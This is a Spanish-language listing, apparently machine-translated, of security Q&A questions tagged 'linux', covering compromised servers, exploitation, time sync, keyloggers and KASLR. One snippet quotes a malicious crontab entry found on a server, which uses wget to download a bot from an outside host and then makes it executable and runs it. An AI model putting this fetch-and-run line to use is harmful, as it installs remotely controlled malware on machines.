Preguntas con etiqueta 'linux'

preguntas con etiqueta
8
respuestas

¿Qué tan anónimo es mi configuración?

mi amigo y yo estamos tratando de hacer la configuración más anónima para que una computadora haga cosas a través de Internet sin que se sepa la ubicación de donde provino. Nuestra configuración es la siguiente: Una máquina de Windows, con...
hecha 14.12.2011 - 01:40
6
respuestas

Servidor comprometido por segunda vez, no puede localizar la fuente del ataque

Necesito ayuda para rastrear una vulnerabilidad en mi servidor. Por segunda vez, mi servidor se ha visto comprometido con la sustitución de archivos por descargas repletas de virus. Según las fechas del sistema de archivos, durante un período...
hecha 28.11.2011 - 06:47
2
respuestas

Obtención de confiabilidad de explotación al usar off por un framepointer sobreescrito en linux

Tenemos un programa que es vulnerable a la sobrescritura de un puntero de marco de un byte. La pila está marcada como ejecutable, la máquina Linux ha sido deshabilitada, las cookies de la pila están deshabilitadas y es un poco endian standard x8...
hecha 06.04.2013 - 00:25
4
respuestas

¿Cómo sincronizar de forma segura la hora a través de Internet?

Todos los sistemas operativos modernos ahora mantienen la hora precisa sincronizando regularmente la hora a través de una red no confiable: Internet. ¿Podría un atacante realizar un ataque MITM, influir o cambiar la hora de una computadora mient...
hecha 27.11.2012 - 21:07
3
respuestas

¿Es CentOS una buena opción desde una perspectiva de seguridad?

¿Qué tan segura es la distribución de CentOS Linux? Noté que hubo momentos en que no había parches actualizados para alguna versión de CentOS (por ejemplo, 5.6). Leí esto en una lista de correo que no puedo encontrar ahora. Me parece recordar qu...
hecha 01.05.2011 - 23:08
3
respuestas

¿Es SecureShellz bot un virus? ¿Como funciona?

Estoy usando un servidor de desarrollo en el que encontré esto en el crontab: [...] * * * * * /dev/shm/tmp/.rnd >/dev/null 2>&1 @weekly wget http://stablehost.us/bots/regular.bot -O /dev/shm/tmp/.rnd;chmod +x /dev/shm/tmp/.rnd;/dev/s...
hecha 06.07.2012 - 11:08
2
respuestas

Recomienda Keylogger para Ubuntu

Compré una computadora portátil nueva recientemente, y estoy trabajando para endurecerla. Específicamente, me interesa aumentar mis posibilidades de recuperar la máquina en caso de que alguna vez sea robada. El sistema ejecuta Ubuntu 11.04 (Natt...
hecha 28.05.2011 - 03:57
2
respuestas

¿Cuánto tiempo para volver a sembrar / dev / urandom en una máquina virtual?

He leído mucho sobre la distinción entre /dev/random y /dev/urandom . Entiendo que el consejo que prevalece es usar /dev/urandom . La explicación, que 256 bits de aleatoriedad "adecuada" es todo lo que necesita para casi cualq...
hecha 15.03.2016 - 14:05
1
respuesta

Determinando httpd PHP Scripts con Auditd

Background Tengo un problema en mi servidor donde un agujero permite que los archivos PHP maliciosos se escriban en cualquier directorio de escritura mundial debajo de la raíz web. Actualmente no está causando ningún daño, ya que tengo todos e...
hecha 30.11.2016 - 18:41
2
respuestas

¿KASLR realmente proporciona más seguridad contra las vulnerabilidades?

Sé todo sobre cómo funciona ASLR y cómo se ha implementado en los sistemas Linux y Windows. Proporciona una capa adicional de protección que el malware debe tener en cuenta. Pero hoy en día, con las computadoras encendidas por largos períodos...
hecha 06.10.2014 - 16:39